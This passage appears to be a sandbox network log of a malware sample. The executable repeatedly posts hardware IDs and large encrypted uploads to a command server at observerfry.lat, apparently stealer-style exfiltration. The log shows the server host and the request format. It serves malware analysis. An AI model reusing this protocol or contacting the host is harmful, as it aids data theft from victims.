C4833E292857C48DBEBA0C6A975F1733
--XGZGWN69Z4L
Content-Disposition: form-data; name="pid"

2
--XGZGWN69Z4L
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--XGZGWN69Z4L
2024-12-24 07:50:42 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:50:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=58m9381hn4r7neienj4p0jjk51; expires=Sat, 19 Apr 2025 01:37:21 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWFwQYPEBEC0ZIyQM4WmoxYDgkRaJvjjEa%2B8DNnxo2%2BiZOOij16pFnTHF7ch4GQ7rdmkBEdIFn2suJi7wxGb4WrdNmi0IWFDsx4JPvAYG0tkVAfZI864nzXmaPmeWJCV86Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6f007fbc950f68-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1520&rtt_var=581&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13740&delivery_rate=1863433&cwnd=238&unsent_bytes=0&cid=317a382093fbe6d5&ts=1016&x=0"
2024-12-24 07:50:42 UTC | 20 | IN | Data Ascii:
f
ok 8.46.123.189
2024-12-24 07:50:42 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49709 | 172.67.199.72 | 443 | 424 | C:\Users\user\Desktop\tTGxYWtjG5.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:50:44 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6AMRFSH27T1LETNRW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15076
Host: observerfry.lat
2024-12-24 07:50:44 UTC | 15076 | OUT | Data Ascii:
--6AMRFSH27T1LETNRW
Content-Disposition: form-data; name="hwid"

C4833E292857C48DBEBA0C6A975F1733
--6AMRFSH27T1LETNRW
Content-Disposition: form-data; name="pid"

2
--6AMRFSH27T1LETNRW
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraf
2024-12-24 07:50:44 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:50:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=19ugjaq8rrh93mj1bu4nfglsg7; expires=Sat, 19 Apr 2025 01:37:23 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvQFna%2F2Yv9bAuTSTU4Gg3E2CgmNygKkiu2GYhfrRaznefsaOVH7ltQqgzkn8E2%2FqYXsJB0ZQzF8%2BXTjsg9tgA8a2HNrIHVf7trsaZg8i1rI3dPLwBEoWX431zbnqudZiVY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6f008e1adc440e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2212&min_rtt=2210&rtt_var=830&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16014&delivery_rate=1321266&cwnd=236&unsent_bytes=0&cid=230ac724b49e3fb7&ts=968&x=0"
2024-12-24 07:50:44 UTC | 20 | IN | Data Ascii:
f
ok 8.46.123.189
2024-12-24 07:50:44 UTC | 5 | IN | Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49715 | 172.67.199.72 | 443 | 424 | C:\Users\user\Desktop\tTGxYWtjG5.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:50:46 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=H7PJEKSB2A4NV42C9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20401
Host: observerfry.lat
2024-12-24 07:50:46 UTC | 15331 | OUT | Data Ascii:
--H7PJEKSB2A4NV42C9
Content-Disposition: form-data; name="hwid"

C4833E292857C48DBEBA0C6A975F1733
--H7PJEKSB2A4NV42C9
Content-Disposition: form-data; name="pid"

3
--H7PJEKSB2A4NV42C9
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraf
2024-12-24 07:50:46 UTC | 5070 | OUT | Data Raw: binary payload (mostly zero bytes, not printable as ASCII)
2024-12-24 07:50:47 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:50:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=516i3889e9cjc96j7g2sjg8gdc; expires=Sat, 19 Apr 2025 01:37:26 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pkR6RP0q6TOnVc26Z6%2Fy4jfLvfvi2dsba1pg9JZGwaixUq1vYoFnUr%2BkPM0A6toHU7mSGCzX11U2fofxNGxpsgg3SdGdFrYRh1J1PXfPdyYjuxbUTRhIIwqO0NUadgCR6E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6f009d2b260f9d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1496&rtt_var=591&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21361&delivery_rate=1805813&cwnd=193&unsent_bytes=0&cid=27961f9ee08f907a&ts=1005&x=0"
2024-12-24 07:50:47 UTC | 20 | IN | Data Ascii:
f
ok 8.46.123.189
2024-12-24 07:50:47 UTC | 5 | IN | Data Ascii:
0


Session ID: 5 | Source: 192.168.2.7:49721 | Destination: 172.67.199.72:443 | PID: 424 | Process: C:\Users\user\Desktop\tTGxYWtjG5.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:50:49 UTC | 273 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=L01YY37EQMF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1218
Host: observerfry.lat
2024-12-24 07:50:49 UTC | 1218 | OUT | Data Raw: 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4c 30 31 59 59 33 37 45 51 4d 46
Data Ascii: --L01YY37EQMFContent-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--L01YY37EQMFContent-Disposition: form-data; name="pid"1--L01YY37EQMFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--L01YY37EQMF (CRLFs are not rendered; the body carries three form fields, hwid, pid and lid, before the remainder shown in the next session)
2024-12-24 07:50:50 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:50:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hvfe68bou5j98amgjstv5uv7na; expires=Sat, 19 Apr 2025 01:37:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ypLqfYNagMTgm1SkyY1NlPzGOxFa1QM%2B5ejhZQioLbmJLRKDNbr6MAC74SEd0x7QJhUxH9FzFXnrFPVt1wlZNcrJwgIn6SPTN9%2FdNX2AghktvYL0PefNum5o7Mc2%2FREcUiU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6f00af6c27efa3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1775&rtt_var=692&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2127&delivery_rate=1551540&cwnd=114&unsent_bytes=0&cid=eccd8772e6fb56cc&ts=754&x=0"
2024-12-24 07:50:50 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189 (chunked body: the size line "f" announces a 15-byte chunk, followed by the chunk "ok 8.46.123.189")
2024-12-24 07:50:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (zero-length chunk terminating the chunked response)


Session ID: 6 | Source: 192.168.2.7:49735 | Destination: 172.67.199.72:443 | PID: 424 | Process: C:\Users\user\Desktop\tTGxYWtjG5.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:50:53 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WX12WBHD86IUKHKE1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 585769
Host: observerfry.lat
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 2d 2d 57 58 31 32 57 42 48 44 38 36 49 55 4b 48 4b 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 58 31 32 57 42 48 44 38 36 49 55 4b 48 4b 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 58 31 32 57 42 48 44 38 36 49 55 4b 48 4b 45 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
Data Ascii: --WX12WBHD86IUKHKE1Content-Disposition: form-data; name="hwid"C4833E292857C48DBEBA0C6A975F1733--WX12WBHD86IUKHKE1Content-Disposition: form-data; name="pid"1--WX12WBHD86IUKHKE1Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 42 93 aa 45 27 ac 79 3c 6a 8f e4 a3 13 a2 f6 12 db 0c 50 7a 71 5f ed 63 a2 d3 37 73 4d fd 58 82 fb 8f 9e be a8 e1 d8 c6 7d 98 5a 28 9f c1 dd ac 96 e9 c6 6b 2d c7 f0 c2 95 0a 83 4c f5 a9 b7 a5 80 32 39 ae 75 bb a2 25 d3 7a e0 c4 6a ce d9 60 6a 2d 13 0b ff e4 f8 cc 1c 2c 1f ae d9 8b 83 0b 6b aa bb aa ca 17 7f 1c 06 27 5b 0e f7 99 f6 14 5c 9d 79 75 ac ff ff 6f 03 b0 4f 2c f1 80 6f 83 67 b1 10 b7 b1 73 97 6e 31 e2 f0 37 58 5c 96 d7 fe bd c3 32 c0 1e 68 76 b8 80 52 34 68 24 93 7b 74 80 57 13 17 7c 80 a1 5b a7 8f c6 7a 27 33 0b 75 fc f6 a2 b6 1f 56 af 9c e7 82 2a 2d c2 0e e4 fe 2e 5d ca 74 19 f0 fe 98 41 e5 65 01 c0 bf d3 6d ae c5 67 98 2e 36 57 a7 c6 a4 f2 63 9e 6c 14 26 42 6f fa 95 c6 79 f3 2f 21 0c 35 bb 11 2e fe 29 a0 b9 7d 36 50 ff 81 81 cb 92 69 aa 37 66
Data Ascii: BE'y<jPzq_c7sMX}Z(k-L29u%zj`j-,k'[\yuoO,ogsn17X\2hvR4h${tW|[z'3uV*-.]tAemg.6Wcl&Boy/!5.)}6Pi7f
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 5d e8 6d f4 46 bd da 08 a2 6a a6 79 1b f4 8c 0c 4a b7 5e a3 3b d4 31 c5 98 68 a0 9c 1f cf b6 88 d7 c1 63 85 c1 9d ab 50 76 63 a8 33 7c 6c 7c b2 18 11 78 2c a1 c3 36 4d d9 19 e2 ae 83 a1 ee bb 89 c2 41 ca 6d 2d 79 48 8d 5d d6 0b b5 3a f7 af d9 65 ae bf 22 2b 9e 8b d3 4e 09 52 fd 36 a0 b1 9d a5 5a 9f e0 ec cc 23 5b 64 dd 6b 1f d3 94 2d 5d 40 5f a4 00 36 12 e3 55 fa d8 6a 41 d8 90 42 d1 ae ba 6d ae ef d4 d1 21 72 bf c1 a9 0e 42 85 6f fe d7 9a 98 9b d2 d6 e8 2f cc df f7 68 e8 79 79 a1 e2 2a 9d 6e 39 7c 9d e7 e4 1d 86 b2 22 78 76 82 4b aa 60 47 df 04 e6 de 45 f5 9a 7f 0a 82 15 b0 b2 42 ad 52 91 88 0e 8b d4 4f 47 cf 1b 76 af b9 5c 8d e0 83 18 77 ae 1d a4 f2 6e 5d d9 49 0d d1 a8 70 9e b7 65 16 d0 16 cf b1 98 51 02 15 38 99 40 c6 ce b2 55 72 c5 1f 7f e7 06 8a 95
Data Ascii: ]mFjyJ^;1hcPvc3|l|x,6MAm-yH]:e"+NR6Z#[dk-]@_6UjABm!rBo/hyy*n9|"xvK`GEBROGv\wn]IpeQ8@Ur
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 2f c4 98 8f bb 51 fc 1e 94 e9 51 6f 9a 6e 09 d1 e1 1d 9c 95 25 dd 29 ab 25 fa 55 c1 25 14 58 9e df 4f 4b 9a 3a b1 7b 6e a1 5e ce 2c a1 72 ec 16 29 85 56 b5 07 0c 3b 07 6d bf 5f f5 5b 09 c9 c0 17 04 c7 ae 1e 65 2f 24 cf 98 0c 10 29 b2 3c 86 cd 77 df 68 e2 18 b3 5f 76 7b d5 ea a5 04 56 41 a8 db c1 8e 02 45 7f 70 70 a2 ac c4 72 7f ce f8 ba d4 c2 d9 f1 aa e4 7e 34 e0 cc 05 d9 ad 53 d7 5a f4 6d 25 54 be d5 51 b8 f9 eb de 13 df 58 a0 41 8d 39 b7 ec ab d0 e7 76 bf 8f c2 1a c5 c0 49 cb f7 1e a7 3e 13 e7 ad 5e de 65 b5 c5 9c 37 e2 49 ba 38 41 97 0b a6 ee 0e 70 49 d2 02 eb 9a 51 ca 39 56 17 58 9b cf 58 d6 3a 3b 50 80 64 29 0d de ac 8b 7b 01 ce ba 88 ba fb fa 8f 57 29 42 b0 4f d4 7a b0 32 db 59 8f 0b 88 0e 33 5c eb 83 9a 65 b3 50 9e 72 7d 41 53 7a 96 72 55 37 37 35
Data Ascii: /QQon%)%U%XOK:{n^,r)V;m_[e/$)<wh_v{VAEppr~4SZm%TQXA9vI>^e7I8ApIQ9VXX:;Pd){W)BOz2Y3\ePr}ASzrU775
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 40 c4 4c a2 42 a7 21 90 40 85 14 be ab 4f 12 c1 0c ca dc 9e 32 e9 e3 2e e2 6d 83 90 af 3d 05 a0 40 80 2c c8 00 1c 80 1f db 31 19 89 46 7c 4a 24 98 f7 83 10 95 ca 41 76 2a 3c a2 6e 40 e7 59 5e 0f 87 81 7e 4f f0 cf b5 f8 0c 71 25 65 81 78 46 4b 75 55 8b 4e 0a 04 4b 41 07 6f b3 7d d0 e0 e6 32 a2 75 db 91 b2 08 bf 33 1f 40 e1 28 72 a0 80 fe ba e2 4e 1c 62 e7 7a aa ab 0b 7a 14 31 0b 05 25 ea ca ab ae 8d ba 06 db 8d 0b 02 16 9e 4f 02 3e 88 fc 2c a4 f3 b6 20 62 c0 a6 3c 76 80 e1 d2 50 f2 d4 f4 f9 31 87 0c 48 c2 48 5c fa ac 82 fc b1 e2 7a 09 44 2a 44 b3 6e c8 24 c2 71 a9 67 7b 83 4a d5 64 55 b1 90 40 cc 25 33 fd d7 b3 ce 99 2a b2 a1 e1 fe 93 28 8b 43 62 a7 cd 8c ad 8c f7 68 b0 b6 0a 25 e9 29 6a 60 ff 70 a3 eb d6 9f 22 4a 8d 7e dd 03 6e be 3f 90 4b a3 de f8 46 9b
Data Ascii: @LB!@O2.m=@,1F|J$Av*<n@Y^~Oq%exFKuUNKAo}2u3@(rNbzz1%O>, b<vP1HH\zD*Dn$qg{JdU@%3*(Cbh%)j`p"J~n?KF
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 3d 46 8c 68 a9 9a e1 5a 19 43 25 5f a4 40 49 b1 33 39 b6 e5 6e cf 0e 2b a8 90 e5 24 56 ea 9d bd 86 01 95 ff a2 a9 c9 1a 84 7a 08 68 61 37 3b f1 a7 83 8a b3 1f f9 b9 07 1d ef 2d 18 f1 e5 5f 59 5f 18 5a 78 fd a2 59 6f e5 5c 61 60 c7 23 97 ef 9f 31 19 be 47 29 92 39 d6 eb ea ad 8f 8c 59 5a 1c 11 1b 67 30 16 18 c7 94 f9 80 e1 9c bf 30 40 4c 11 07 d3 c4 02 3e 7f ce a2 ca 8d 8a 85 b1 e9 ba c4 d0 04 e4 d2 67 ef ed 59 66 a5 47 62 9c 36 9a 1a be 6c 03 ad ea 53 43 a9 14 40 3b 32 98 a7 6c 42 26 df cc 7d c8 f9 a2 04 f5 55 49 e0 e5 21 d0 3d 75 8e 7e 60 a0 d8 e9 fa 29 06 ac 9c e1 f8 f8 c0 2c 2c 6d 64 90 6e b4 40 69 61 f4 ab 8e 72 64 07 21 e6 0c 04 dc be 9c 7c 03 4b f9 fa e4 a7 36 2a fc ac a9 5d 58 58 56 d6 27 13 41 9a 25 fc 0a 51 54 6c 70 a9 d5 00 82 2e 2f 46 d6 8d a4
Data Ascii: =FhZC%_@I39n+$Vzha7;-_Y_ZxYo\a`#1G)9YZg00@L>gYfGb6lSC@;2lB&}UI!=u~`),,mdn@iard!|K6*]XXV'A%QTlp./F
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: 66 56 22 f9 e8 a6 b2 cd ff fa 65 ad c4 c5 12 6d 78 0c 32 09 0c 59 69 4a c0 71 47 84 7e 0d 31 79 e1 45 cc 56 ee 8a 79 1c 35 ae 66 6d 35 4e 67 7e 83 2e 80 3d 7c 32 49 a2 0a 9f 1f d7 44 f4 65 0b 70 4d 9f 3a 83 21 10 a4 a1 b4 3a 8a 5c b6 d0 ea ed af ca 32 b0 21 77 e6 12 26 4d cf 18 43 ce 82 ba cb 98 8a e0 32 59 fc d5 82 b1 31 de 31 55 0b 25 b2 3c a5 e7 0e ae 42 00 31 0b b1 04 c0 f5 18 3e fa 59 1e e4 45 d1 b0 0c 8b e0 b8 33 04 54 98 22 af d7 b1 ea 93 f3 a6 f0 ff 98 d4 4c 88 3a 34 73 f8 a7 cc a8 c2 64 c1 22 7f 3e ee 4f 88 d1 fd a2 9e 2e 23 ea ff 9a 57 bd 77 dd 2e 27 e0 2e 3a e2 37 6e db e4 7f 8d 3a f1 a4 10 15 11 af fc 70 5d 6f 9a 26 05 91 0f c1 d5 8e c0 48 41 90 b2 3b 06 d9 f1 ff f8 42 d7 79 09 cd df 3d 2d ba e4 06 1f 5e a3 52 c3 9e 89 d7 44 be ae e7 02 4a ab
Data Ascii: fV"emx2YiJqG~1yEVy5fm5Ng~.=|2IDepM:!:\2!w&MC2Y11U%<B1>YE3T"L:4sd">O.#Ww.'.:7n:p]o&HA;By=-^RDJ
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: e3 f9 27 2f 3d be 3f 7a e9 51 e7 30 67 4f fa fa cf dd 63 fd b4 27 15 bf 6c 2e 33 cf 88 07 11 d7 9d 05 a2 ff 6a f7 48 8f b2 a0 f8 67 55 f9 1b 7d ba 7b ff d6 48 0f e5 da 65 60 08 6a 0a 5e fc e7 6d f6 d5 51 83 cf 58 5c 64 5e 12 a4 30 15 2c b7 76 34 bf 3b 8c 13 97 30 df bb a2 4e d9 d5 6f ac a4 12 c7 8f b0 76 f8 d2 16 18 f8 9d bc 05 3f 75 26 7c a7 1e 4c 3d 94 42 63 8d ba a8 af f4 4c bc 4a 07 4d 1f 3b ee ef 9e 1b 99 98 cc ab 59 a1 cc a6 b2 6b d3 23 59 25 a3 01 4c c5 74 cf 21 b6 74 dc 6e 38 22 bf b4 ef 91 3f 63 d0 61 de 9e 0a 5f 96 72 ef 4c f6 d4 ad 5c 90 b5 75 da 8b ff 42 a9 b6 f2 b1 a6 0d cd 0c 7f 80 c5 6d 73 6e 6d 5d 2e 7f a0 2b 59 36 37 ba b9 db 74 a8 f2 85 9d 9e 68 95 e8 ec b7 8d d1 aa 85 64 66 57 55 9b 17 ab 91 cd 73 74 3c 68 77 32 55 64 3b 23 e3 d1 82 6f
Data Ascii: '/=?zQ0gOc'l.3jHgU}{He`j^mQX\d^0,v4;0Nov?u&|L=BcLJM;Yk#Y%Lt!tn8"?ca_rL\uBmsnm].+Y67thdfWUst<hw2Ud;#o
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: e2 bd 9f a6 8b dc b2 36 cd b0 cf 42 f1 c5 c2 e6 23 55 91 41 97 be 55 7f bb ea c7 7a ff a7 4b 1b 25 2c 34 c9 32 38 14 b9 96 a3 8d 96 d4 00 b2 f8 4b e4 98 cd 0b 32 e4 11 86 c4 d2 af 1b b9 f3 99 e1 a5 37 2e 9f 24 af 44 89 87 7b e5 a6 9b 84 89 43 63 2c 83 38 5c 34 25 ff 10 5c 34 61 ac 50 15 19 9c 0a b9 76 3d cb 1f 0c 1d f8 01 a9 29 b4 d7 dd 2b 60 d3 cf a8 c7 04 12 6b 68 cd 50 36 c3 5c 1a 8e 40 f1 0a 13 6b 67 1a 1e 87 72 4f 7e f2 ee 43 a5 46 c0 ee ec 0e 6b b5 cc 6a 45 76 be 85 c5 4a a4 0d cc 05 be af 35 1c 40 44 38 da 06 3c df 4b f3 d8 3c 4b e2 fa 2e 9d 7c d4 e0 b8 06 3d 4b 1c 8e 0c d2 fe a1 26 ba b6 63 7f 7b e5 a4 58 bb d1 bd cb 59 4c 7b fe 8f 8e 98 d0 54 1c a5 d0 76 24 24 17 f3 62 a0 c2 c0 83 e7 e9 85 cb dc 93 81 ee 35 38 fb 88 83 ec 94 14 4e f4 d2 53 88 76
Data Ascii: 6B#UAUzK%,428K27.$D{Cc,8\4%\4aPv=)+`khP6\@kgrO~CFkjEvJ5@D8<K<K.|=K&c{XYL{Tv$$b58NSv
2024-12-24 07:50:53 UTC | 15331 | OUT | Data Raw: b9 a8 49 f6 13 89 f9 15 9c f9 7c fa 9f b3 a1 c1 15 d5 a1 fd 1a 43 d6 39 7a 3f 78 b0 9b be 1d e8 b2 2f ef cd 5f 89 bd 0f 37 74 a8 93 a3 60 5c 9c 8e 1c c1 cf ee 5d 3f 96 88 8b e9 12 fa fd 89 6d 3d e1 e4 c2 7e 19 e8 78 15 ae d9 b9 cb 09 0e 87 a3 65 c4 04 36 82 1b 58 aa 52 59 41 7f fe a5 3b 60 69 0b 0d a9 5c 09 61 e8 f9 db 74 84 ff de 7d b3 e6 a2 44 9f 87 98 43 f6 0e 25 b9 0a c5 7b 6a cf 07 34 b4 b1 bd c1 50 fc cd fe 13 d2 cb d4 6d 19 fc f1 ba d5 0e 06 c3 6d 74 82 69 ce 59 01 7b 99 c8 a9 30 85 bb 62 ea 90 ac 7d 70 e7 90 95 d6 3c 9b 7e 88 1b 7f 99 fd 9e 5f 8c e7 13 39 c0 e0 27 f7 84 28 52 8b e6 6d f0 62 b3 d2 cb 66 70 08 ec ff b0 45 ed ca d5 b5 6f 87 e1 bd 0a c4 2e 6d d9 44 55 c3 1c 74 e7 eb be 04 2f 07 13 98 9b eb 7d 1e 0a e0 b2 bb 7c 08 a7 98 d1 b5 5e 13 34
Data Ascii: I|C9z?x/_7t`\]?m=~xe6XRYA;`i\at}DC%{j4PmmtiY{0b}p<~_9'(RmbfpEo.mDUt/}|^4
2024-12-24 07:50:56 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:50:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2m5f7ih9p54gd2ffafj3pt8pam; expires=Sat, 19 Apr 2025 01:37:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHBgNSxYWwjdM1Z9jtTVzKCDiM1qifIaoiaBOQ0UOUnszjmd42wVoeN7nhBnZblRVbWlbiQsiCG17K%2Fp%2FAwSr4ohpMqpSy5p5Ybg2X8IdXLbtUByewCN%2BnmD7WEOa38QvMY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6f00c6df9541f2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1754&rtt_var=659&sent=360&recv=608&lost=0&retrans=0&sent_bytes=2835&recv_bytes=588358&delivery_rate=1658148&cwnd=231&unsent_bytes=0&cid=f193914935fbc469&ts=3672&x=0"


Session ID: 7 | Source: 192.168.2.7:49746 | Destination: 172.67.199.72:443 | PID: 424 | Process: C:\Users\user\Desktop\tTGxYWtjG5.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:50:58 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 88
Host: observerfry.lat
2024-12-24 07:50:58 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=C4833E292857C48DBEBA0C6A975F1733 (same hwid and lid values as the multipart uploads in sessions 5 and 6)
2024-12-24 07:50:58 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:50:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
